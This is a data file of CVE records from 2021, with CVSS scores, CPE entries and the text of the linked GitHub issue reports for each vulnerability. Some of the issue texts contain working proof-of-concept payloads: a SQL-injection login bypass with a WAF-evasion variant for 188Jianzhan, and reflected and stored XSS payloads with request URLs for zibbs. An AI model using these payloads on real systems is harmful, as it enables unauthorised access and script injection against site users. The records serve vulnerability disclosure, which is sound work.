"criteria": "cpe:2.3:a:gilcc_project:gilcc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BBB8171A-9F3D-46B6-B948-F89F365D61FD",
"versionEndExcluding": "2019-12-22",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/trgil/gilcc/issues/1 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"trgil",
"gilcc"
] | hi, I find out-of-bounds array access and bufferoverflow in **src_parser.c:src_parser_trans_stage_1_2_3** :)
[crash.zip](https://github.com/trgil/gilcc/files/3992356/crash.zip)
| out-of-bounds array access and bufferoverflow | https://api.github.com/repos/trgil/gilcc/issues/1/comments | 3 | 2019-12-22T10:54:02Z | 2020-02-29T11:29:42Z | https://github.com/trgil/gilcc/issues/1 | 541,435,995 | 1 | 2,743 |
CVE-2020-21573 | 2021-11-02T18:15:08.077 | An issue was discoverered in in abhijitnathwani image-processing v0.1.0, allows local attackers to cause a denial of service via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/abhijitnathwani/image-processing/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/abhijitnathwani/image-processing/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:image-processing_project:image-processing:0.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B2990A14-AAD6-476D-9A2B-A7357984C9D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/abhijitnathwani/image-processing/issues/3 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"abhijitnathwani",
"image-processing"
] | hi, I only modified the input image file and cause stack exhausted. I think variable **_buffer_** should not be defined as a local variable, but should be dynamically applied for heap space. :)
[crash.zip](https://github.com/abhijitnathwani/image-processing/files/3994094/crash.zip)
| Stack exhuasted | https://api.github.com/repos/abhijitnathwani/image-processing/issues/3/comments | 2 | 2019-12-23T07:55:31Z | 2020-07-08T09:18:08Z | https://github.com/abhijitnathwani/image-processing/issues/3 | 541,630,239 | 3 | 2,744 |
CVE-2020-23685 | 2021-11-02T18:15:08.163 | SQL Injection vulnerability in 188Jianzhan v2.1.0, allows attackers to execute arbitrary code and gain escalated privileges, via the username parameter to login.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vtime-tech/188Jianzhan/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vtime-tech/188Jianzhan/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vtimecn:188jianzhan:2.10:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9E7BC5-8E4B-4871-99F4-43C315F868B5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/vtime-tech/188Jianzhan/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"vtime-tech",
"188Jianzhan"
] | There is SQL injection vulnerability in the login office of 188Jianzhan, which can bypass WAF and direct universal password without the need to verify the login background.

At line 29, querying $user and $PWD using the SELECT statement does not do any effective filtering. So there is an SQL injection vulnerability and you can log in directly with the universal password `admin' and 1=1#`
But first, we need to bypass WAF.There's a 360waf protection.

We can use` like `instead of `=`
In the end,The payload :`admin' or 1 like 1#`,Then enter any password。

| 118jianzhan v2.10 /Admin/login.php sql injection vulnerability | https://api.github.com/repos/vtime-tech/188Jianzhan/issues/2/comments | 1 | 2020-06-21T09:29:24Z | 2021-08-18T14:53:42Z | https://github.com/vtime-tech/188Jianzhan/issues/2 | 642,528,756 | 2 | 2,745 |
CVE-2020-23718 | 2021-11-02T18:15:08.247 | Cross site scripting (XSS) vulnerability in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the route parameter to index.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xujinliang/zibbs/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xujinliang/zibbs/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zibbs_project:zibbs:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8C00A530-FD11-4C90-A706-14BE8213C7F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/xujinliang/zibbs/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xujinliang",
"zibbs"
] |
First follow to the index.php entry file, which will load the frame file directly, so just visit the following address
`http://20.20.20.130:8000/zibbs/index.php`
`http://20.20.20.130:8000/zibbs`
Will directly load the framework file and instantiate the framework class

Directly trace to the **core/framework.php** file. After analysis, this CMS handles the processing of each controller and operation through 【route】, wherein the parameter route is the controller name and action name to be filled in in this GET request.
**core/framework.php**

A normal GET request would look like this
http://20.20.20.130:8000/zibbs/index.php?route=admin/login

And here the parameter 【route】 is controllable, The value of the input parameter 【route】 is processed as follows, The value of the parameter【router】is first split through /,Such as route=aaa/bbb, the aaa Is the controller name,bbb for the action of, It also makes conditional judgments about whether the controller and the action name exist, When the Controller name does not exist, it will directly output "aaa Controller Controller does not exist 11111", as shown below


This is for the parameter 【route】, If the controller doesn't exist, The value of the input parameter 【route】 is displayed directly, And the following values, without XSS filtering, Only the addslashes() method is done here, and there is no XSS filtering function in this aspect

Because there is no filtering here, there is reflective XSS, which is tested as follows
Because of the split for / here, the regular XSS payload cannot be taken from a bomb frame, so using the following XSS payload can make a bomb fram
<img src=x onerror=prompt(1)>
http://20.20.20.130:8000/zibbs/index.php?route=1111%3Cimg%20src=x%20onerror=prompt(1)%3E


The following test statement can also cause a pop-up as normal
route=admin/<img src=x onerror=prompt(1)>

**Solution:**
filter or encode special characters like this
<
>
"
'
&
%
... ...
and filter some keyword like this
script
javascript
... ...
or filter some label function which can run javascript like this
onclick
onerror
onload
... ...
| The function parameter [Route] has reflective XSS | https://api.github.com/repos/xujinliang/zibbs/issues/4/comments | 1 | 2020-06-18T07:51:59Z | 2020-06-18T08:07:08Z | https://github.com/xujinliang/zibbs/issues/4 | 640,989,968 | 4 | 2,746 |
CVE-2020-23719 | 2021-11-02T18:15:08.287 | Cross site scripting (XSS) vulnerability in application/controllers/AdminController.php in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the bbsmeta parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xujinliang/zibbs/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xujinliang/zibbs/issues/5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zibbs_project:zibbs:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8C00A530-FD11-4C90-A706-14BE8213C7F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/xujinliang/zibbs/issues/5 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xujinliang",
"zibbs"
] | First log in to the background and go to the background Settings,(Compare the storage XSS vulnerabilities of chicken ribs)

Description here(HTML syntax support),Guess there is an XSS vulnerability,Get the parameter 【bbsmeta】here by grabbing the bag,Trace in the source code
**application/controllers/AdminController.php code**

This was filtered by addslashes() and htmlspecialchar ()
Obviously when you insert the data into the database you will have a layer of filtering, and then you will continue to track the specific page output location of this parameter to the following
**application/views/index/index.php code**

When the page is output here, the following function is made for the parameter 【bbsmeta】to handle htmlspecialchars_decode
The storage XSS here results in the storage XSS due to the use ofhtmlspecialchars_decode() function,
So through the black box to verify
Insert the following test statement in the background and click Update
**payload:**
<script>alert(/xss/)</script>

The XSS is then accessed directly to the foreground and executed successfully
`**http://20.20.20.129:8000/zibbs/index.php**`


**Solution:**
filter or encode special characters like this
<
>
"
'
&
%
... ...
and filter some keyword like this
script
javascript
... ...
or filter some label function which can run javascript like this
onclick
onerror
onload
... ...
| Background setting function parameter【bbsmeta】Storage XSS vulnerabilities | https://api.github.com/repos/xujinliang/zibbs/issues/5/comments | 4 | 2020-06-23T03:15:15Z | 2020-06-23T03:37:38Z | https://github.com/xujinliang/zibbs/issues/5 | 643,496,532 | 5 | 2,747 |
CVE-2021-41238 | 2021-11-02T18:15:08.777 | Hangfire is an open source system to perform background job processing in a .NET or .NET Core applications. No Windows Service or separate process required. Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization filters specified, `LocalRequestsOnlyAuthorizationFilter` filter is being used to allow only local requests and prohibit all the remote requests to provide sensible, protected by default settings. However due to the recent changes, in version 1.7.25 no authorization filters are used by default, allowing remote requests to succeed. If you are using `UseHangfireDashboard` method with default `DashboardOptions.Authorization` property value, then your installation is impacted. If any other authorization filter is specified in the `DashboardOptions.Authorization` property, the you are not impacted. Patched versions (1.7.26) are available both on Nuget.org and as a tagged release on the github repo. Default authorization rules now prohibit remote requests by default again by including the `LocalRequestsOnlyAuthorizationFilter` filter to the default settings. Please upgrade to the newest version in order to mitigate the issue. For users who are unable to upgrade it is possible to mitigate the issue by using the `LocalRequestsOnlyAuthorizationFilter` explicitly when configuring the Dashboard UI. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/HangfireIO/Hangfire/issues/1958"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/HangfireIO/Hangfire/issues/1958"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hangfire:hangfire:1.7.25:*:*:*:*:*:*:*",
"matchCriteriaId": "B0C79641-C046-4220-BC96-640A6D4D9E42",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"862"
] | 862 | https://github.com/HangfireIO/Hangfire/issues/1958 | [
"Third Party Advisory"
] | github.com | [
"HangfireIO",
"Hangfire"
] | When using Dashboard version 1.7.24, the dashboard is not accessible from outside of the server (401).
As of version 1.7.25, it is accessible from outside of the server by default.
I have no authorization configured, so by default it should not allow access from outside of the server. | Dashboard accessible from outside by default (since 1.7.25) | https://api.github.com/repos/HangfireIO/Hangfire/issues/1958/comments | 3 | 2021-10-26T10:28:25Z | 2021-10-27T16:17:45Z | https://github.com/HangfireIO/Hangfire/issues/1958 | 1,036,117,302 | 1,958 | 2,749 |
CVE-2021-41036 | 2021-11-03T00:15:08.023 | In versions prior to 1.1 of the Eclipse Paho MQTT C Client, the client does not check rem_len size in readpacket. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "emo@eclipse.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:paho_mqtt_c\\/c\\+\\+_client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D118B76A-6E83-4AB0-9701-6248169CB482",
"versionEndExcluding": "1.1.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/eclipse/paho.mqtt.embedded-c/issues/96 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"eclipse",
"paho.mqtt.embedded-c"
] | in readPacket function, should check rem_len with readbuf_size between step 2 and step 3. | should check rem_len size in readpacket. | https://api.github.com/repos/eclipse-paho/paho.mqtt.embedded-c/issues/96/comments | 3 | 2017-06-21T06:12:07Z | 2021-11-02T23:18:06Z | https://github.com/eclipse-paho/paho.mqtt.embedded-c/issues/96 | 237,425,026 | 96 | 2,750 |
CVE-2020-23109 | 2021-11-03T17:15:08.027 | Buffer overflow vulnerability in function convert_colorspace in heif_colorconversion.cc in libheif v1.6.2, allows attackers to cause a denial of service and disclose sensitive information, via a crafted HEIF file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libheif/issues/207"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libheif/issues/207"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libheif:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "70C2B8C8-0EE3-4AAF-8584-F639A0428F03",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/strukturag/libheif/issues/207 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libheif"
] | I spotted this overflow in `heif_colorconversion.cc`.
##### how to reproduce:
```./heif-convert heap-overflow.poc test.png```
[heap-overflow.poc.zip](https://github.com/strukturag/libheif/files/4242885/heap-overflow.poc.zip)
Here is the report of ASAN
```
==19327==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62300000350e at pc 0x0000007cf8f3 bp 0x7ffd1d38dbd0 sp 0x7ffd1d38dbc8
READ of size 2 at 0x62300000350e thread T0
#0 0x7cf8f2 in Op_YCbCr420_to_RRGGBBaa::convert_colorspace(std::shared_ptr<heif::HeifPixelImage const> const&, heif::ColorState, heif::ColorConversionOptions) libheif/heif_colorconversion.cc:2263:58
#1 0x7fd4d8 in heif::ColorConversionPipeline::convert_image(std::shared_ptr<heif::HeifPixelImage> const&) libheif/heif_colorconversion.cc:2446:15
#2 0x781134 in heif::convert_colorspace(std::shared_ptr<heif::HeifPixelImage> const&, heif_colorspace, heif_chroma) libheif/heif_image.cc:396:19
#3 0x5d4e46 in heif::HeifContext::Image::decode_image(std::shared_ptr<heif::HeifPixelImage>&, heif_colorspace, heif_chroma, heif_decoding_options const*) const libheif/heif_context.cc:896:11
#4 0x549151 in heif_decode_image libheif/heif.cc:660:33
#5 0x522111 in main examples/heif_convert.cc:226:11
#6 0x7f3e8328182f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
#7 0x41e308 in _start (examples/heif-convert+0x41e308)
0x62300000350f is located 0 bytes to the right of 6159-byte region [0x623000001d00,0x62300000350f)
allocated by thread T0 here:
#0 0x51a178 in operator new[](unsigned long) (examples/heif-convert+0x51a178)
#1 0x77b052 in heif::HeifPixelImage::add_plane(heif_channel, int, int, int) libheif/heif_image.cc:151:27
SUMMARY: AddressSanitizer: heap-buffer-overflow libheif/heif_colorconversion.cc:2263:58 in Op_YCbCr420_to_RRGGBBaa::convert_colorspace(std::shared_ptr<heif::HeifPixelImage const> const&, heif::ColorState, heif::ColorConversionOptions)
Shadow bytes around the buggy address:
0x0c467fff8650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c467fff8660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c467fff8670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c467fff8680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c467fff8690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c467fff86a0: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c467fff86b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c467fff86c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c467fff86d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c467fff86e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c467fff86f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19327==ABORTING
```
| Heap overflow in heif_colorconversion.cc:2263 | https://api.github.com/repos/strukturag/libheif/issues/207/comments | 9 | 2020-02-24T02:04:49Z | 2025-03-02T17:19:39Z | https://github.com/strukturag/libheif/issues/207 | 569,601,645 | 207 | 2,751 |
CVE-2020-23679 | 2021-11-03T17:15:08.117 | Buffer overflow vulnerability in Renleilei1992 Linux_Network_Project 1.0, allows attackers to execute arbitrary code, via the password field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Renleilei1992/Linux_Network_Project/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Renleilei1992/Linux_Network_Project/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linux_network_project:linux_network_project:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A7DA1B65-B95B-4EDC-A1E7-5D6D9673EA02",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
